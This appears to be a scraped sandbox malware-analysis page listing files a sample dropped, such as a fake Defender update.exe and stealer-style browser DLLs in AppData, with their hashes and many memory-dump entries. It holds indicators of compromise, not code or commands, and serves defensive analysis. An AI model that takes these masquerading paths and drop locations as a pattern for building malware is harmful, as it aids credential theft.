\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
\Users\Admin\AppData\Roaming\23C7.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\L0g83Hu6.exe
Filesize
6.0MB

MD5
8ad7ebbbf5a304600fff6fd8b1e77a74

SHA1
88ae13dfbc5a2fb9fea8098baff0482c2ceb97e3

SHA256
cf9f6cd9abcd19d7aa618e12c9f599989e451f602d69cee6947638c4b138c009

SHA512
9172888a4b21f05aad4ec01c2e58bf6c768ea3d54b74daf432aeccf160d8435704a888130d59b785c79ba8daa2099b52769cc44223988a0d426fcb728793fdc5

Download Submit
\Users\Admin\AppData\Roaming\bgVUh3Ro.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
memory/420-186-0x00000000003C0000-0x00000000003EA000-memory.dmp

Filesize
168KB

Download
memory/420-192-0x00000000374E0000-0x00000000374F0000-memory.dmp

Filesize
64KB

Download
memory/420-183-0x0000000000390000-0x00000000003B3000-memory.dmp

Filesize
140KB

Download
memory/420-179-0x0000000000390000-0x00000000003B3000-memory.dmp

Filesize
140KB

Download
memory/420-182-0x000007FEBE670000-0x000007FEBE680000-memory.dmp

Filesize
64KB

Download
memory/572-115-0x0000000000000000-mapping.dmp

Download
memory/668-144-0x0000000000000000-mapping.dmp

Download
memory/668-88-0x0000000000000000-mapping.dmp

Download
memory/780-79-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-65-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-62-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-71-0x000000000040779C-mapping.dmp

Download
memory/780-73-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-70-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-68-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-67-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-75-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/780-63-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/808-133-0x0000000000000000-mapping.dmp

Download
memory/888-109-0x0000000000000000-mapping.dmp

Download
memory/896-148-0x0000000000000000-mapping.dmp

Download
memory/916-117-0x0000000000000000-mapping.dmp

Download
memory/920-135-0x0000000000000000-mapping.dmp

Download
memory/944-126-0x0000000000000000-mapping.dmp

Download
memory/976-151-0x0000000000000000-mapping.dmp

Download
memory/1032-107-0x0000000000000000-mapping.dmp

Download
memory/1060-119-0x0000000000000000-mapping.dmp

Download
memory/1100-154-0x0000000000000000-mapping.dmp

Download
memory/1124-121-0x0000000000000000-mapping.dmp

Download
memory/1260-138-0x0000000000000000-mapping.dmp

Download
memory/1264-132-0x0000000000000000-mapping.dmp

Download
memory/1332-141-0x0000000000000000-mapping.dmp

Download
memory/1332-114-0x0000000000000000-mapping.dmp

Download
memory/1360-125-0x0000000000000000-mapping.dmp

Download
memory/1396-129-0x0000000140001844-mapping.dmp

Download
memory/1420-103-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1420-101-0x000007FEEE020000-0x000007FEEEA43000-memory.dmp

Filesize
10.1MB

Download
memory/1420-104-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1420-102-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmp

Filesize
11.4MB

Download
memory/1420-99-0x0000000000000000-mapping.dmp

Download
memory/1420-105-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/1420-106-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/1476-136-0x0000000000000000-mapping.dmp

Download
memory/1504-113-0x0000000000000000-mapping.dmp

Download
memory/1516-60-0x000000006E1B0000-0x000000006E75B000-memory.dmp

Filesize
5.7MB

Download
memory/1516-59-0x000000006E1B0000-0x000000006E75B000-memory.dmp

Filesize
5.7MB

Download
memory/1516-57-0x0000000000000000-mapping.dmp

Download
memory/1516-61-0x000000006E1B0000-0x000000006E75B000-memory.dmp

Filesize
5.7MB

Download
memory/1532-111-0x0000000000000000-mapping.dmp

Download
memory/1564-143-0x0000000000000000-mapping.dmp

Download
memory/1572-110-0x0000000000000000-mapping.dmp

Download
memory/1588-155-0x000007FEF3640000-0x000007FEF419D000-memory.dmp

Filesize
11.4MB

Download
memory/1588-158-0x0000000001264000-0x0000000001267000-memory.dmp

Filesize
12KB

Download
memory/1588-176-0x00000000774A0000-0x0000000077649000-memory.dmp

Filesize
1.7MB

Download
memory/1588-175-0x000000000126B000-0x000000000128A000-memory.dmp

Filesize
124KB

Download
memory/1588-177-0x0000000077380000-0x000000007749F000-memory.dmp

Filesize
1.1MB

Download
memory/1588-173-0x0000000001264000-0x0000000001267000-memory.dmp

Filesize
12KB

Download
memory/1588-152-0x000007FEF41A0000-0x000007FEF4BC3000-memory.dmp

Filesize
10.1MB

Download
memory/1588-147-0x0000000000000000-mapping.dmp

Download
memory/1588-160-0x0000000077380000-0x000000007749F000-memory.dmp

Filesize
1.1MB

Download
memory/1588-159-0x00000000774A0000-0x0000000077649000-memory.dmp

Filesize
1.7MB

Download
memory/1612-108-0x0000000000000000-mapping.dmp

Download
memory/1624-134-0x0000000000000000-mapping.dmp

Download
memory/1628-156-0x0000000000000000-mapping.dmp

Download
memory/1636-86-0x0000000000000000-mapping.dmp

Download
memory/1648-116-0x0000000000000000-mapping.dmp

Download
memory/1648-142-0x0000000000000000-mapping.dmp

Download
memory/1688-93-0x000000001BAD0000-0x000000001BFA2000-memory.dmp

Filesize
4.8MB

Download
memory/1688-98-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

Filesize
8KB

Download
memory/1688-94-0x00000000001A0000-0x0000000000672000-memory.dmp

Filesize
4.8MB

Download
memory/1688-95-0x0000000000750000-0x0000000000756000-memory.dmp

Filesize
24KB

Download
memory/1688-127-0x00000000027B0000-0x00000000027BA000-memory.dmp

Filesize
40KB

Download
memory/1688-96-0x000000001BFA0000-0x000000001C454000-memory.dmp

Filesize
4.7MB

Download
memory/1688-97-0x00000000026D0000-0x00000000026D6000-memory.dmp

Filesize
24KB

Download
memory/1696-124-0x0000000000000000-mapping.dmp

Download
memory/1724-81-0x0000000000000000-mapping.dmp

Download
memory/1724-92-0x0000000000400000-0x0000000000D73000-memory.dmp

Filesize
9.4MB

Download
memory/1724-185-0x0000000077680000-0x0000000077800000-memory.dmp

Filesize
1.5MB

Download
memory/1724-157-0x00000000740E0000-0x000000007468B000-memory.dmp

Filesize
5.7MB

Download
memory/1724-145-0x0000000000000000-mapping.dmp

Download
memory/1724-85-0x0000000000400000-0x0000000000D73000-memory.dmp

Filesize
9.4MB

Download
memory/1724-178-0x00000000740E0000-0x000000007468B000-memory.dmp

Filesize
5.7MB

Download
memory/1724-87-0x0000000000400000-0x0000000000D73000-memory.dmp

Filesize
9.4MB

Download
memory/1732-123-0x0000000000000000-mapping.dmp

Download
memory/1744-112-0x0000000000000000-mapping.dmp

Download
memory/1760-189-0x0000000077680000-0x0000000077800000-memory.dmp

Filesize
1.5MB

Download
memory/1760-188-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1760-162-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1760-195-0x0000000077680000-0x0000000077800000-memory.dmp

Filesize
1.5MB

Download
memory/1760-194-0x00000000002C0000-0x00000000002E1000-memory.dmp

Filesize
132KB

Download
memory/1760-193-0x00000000000E0000-0x00000000000FB000-memory.dmp

Filesize
108KB

Download
memory/1760-184-0x00000000000E0000-0x00000000000FB000-memory.dmp

Filesize
108KB

Download
memory/1760-169-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1760-163-0x00000000004039E0-mapping.dmp

Download
memory/1816-118-0x0000000000000000-mapping.dmp

Download
memory/1828-120-0x0000000000000000-mapping.dmp

Download
memory/1828-146-0x0000000000000000-mapping.dmp

Download
memory/1832-90-0x0000000000000000-mapping.dmp

Download
memory/1888-164-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1888-165-0x00000001400033F4-mapping.dmp

Download
memory/1888-190-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1888-191-0x00000000774A0000-0x0000000077649000-memory.dmp

Filesize
1.7MB

Download
memory/1888-174-0x0000000077380000-0x000000007749F000-memory.dmp

Filesize
1.1MB

Download
memory/1888-172-0x00000000774A0000-0x0000000077649000-memory.dmp

Filesize
1.7MB

Download
memory/1888-170-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1888-196-0x00000000774A0000-0x0000000077649000-memory.dmp

Filesize
1.7MB

Download
memory/1972-54-0x0000000000AD0000-0x0000000000C7E000-memory.dmp

Filesize
1.7MB

Download
memory/1972-56-0x0000000005A20000-0x0000000005BD0000-memory.dmp

Filesize
1.7MB

Download
memory/1972-55-0x0000000075501000-0x0000000075503000-memory.dmp

Filesize
8KB

Download
memory/2032-140-0x0000000000000000-mapping.dmp

Download
memory/2036-122-0x0000000000000000-mapping.dmp

Download